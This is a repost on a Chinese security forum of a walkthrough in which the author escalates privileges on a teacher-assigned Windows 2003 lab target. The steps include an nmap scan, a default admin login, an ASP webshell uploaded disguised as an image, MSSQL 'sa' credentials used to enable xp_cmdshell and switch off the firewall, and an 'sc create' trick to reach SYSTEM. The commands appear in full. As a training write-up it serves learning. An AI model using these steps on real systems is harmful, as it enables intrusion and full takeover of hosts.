安全矩阵

 找回密码
 立即注册
搜索
查看: 169|回复: 0

给某个伙伴展示一次渗透提权

[复制链接]

177

主题

192

帖子

794

积分

高级会员

Rank: 4

积分
794
发表于 2022-12-4 22:54:36 | 显示全部楼层 |阅读模式

给某个伙伴展示一次渗透提权
原文链接:给某个伙伴展示一次渗透提权
程序员阿甘 2022-12-04 13:00 发表于北京
这是一个某个正在学习安全伙伴告诉我,他老师给他一个靶机让他提权,他不知道怎么下手,让我来试一下,那就试一下
编辑
知道网段ip没开机密码,他说这个靶机是这样的。
固定ip是 192.168.3.5
是个win2003r2的系统
那就先把虚拟机配置一下

编辑

加一个192.168.3.0网段的网络
把第一个网络适配器添加上VMnet2这个网络
编辑

然后在我的kali虚拟机上也添加VMnet2网卡
开机ifconfig看看
编辑
添加上了
然后ping一下看能不能ping通
编辑
能通
用nmap简单扫下服务和端口
好多开放端口
有23端口但是没密码
有445端口用msf搞了一波似乎不行,可能打了补丁
编辑
上面有好几个站点, 随便选一个默认密码就进后台了
编辑
剩下直接拿shell行了
直接传一张图片马,他后台有个文件改名
编辑
通过抓包把文件类型改了,改成图片里面一句话马的执行类型,这个站是asp站,我传的是asp马,所以改的也是asp
ok
链接了上来
编辑
传了个msf马上来执行不了,没有权限
编辑
提权
尝试通过mssql数据库提权方法
在里面的代码文件找出数据库账号密码

编辑
账号:sa
密码:admin
看能不能链接
连上了

编辑

用 exec xp_cmdshell 执行命令
exec sp_configure 'show advanced options',1;
RECONFIGURE;
exec sp_configure 'xp_cmdshell',1;
RECONFIGURE;

编辑

exec xp_cmdshell 'netsh advfirewall set allprofiles state off';
关闭防火墙
exec xp_cmdshell 'net user';
查看用户
编辑

把账户密码改了

编辑
这下能登录进去了
编辑
只是administration权限,我需要最高的system权限
编辑
用SC提权方法
sc提权只适合老系统,xp win7 2003这些,其他系统有其他方法
sc Create sys binPath="cmd / c start" type= own type= interact
sc start sys
虽然提示失败1053 但是最高权限system窗口弹出来了

编辑
编辑
本文作者:一个路过的小黑转载自:https://www.cnblogs.com/ms0708/p/16747644.html版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权烦请告知,我们会立即删除并表示歉意。祝愿每一位读者生活愉快!谢谢!

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2023-1-31 17:19 , Processed in 0.013640 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表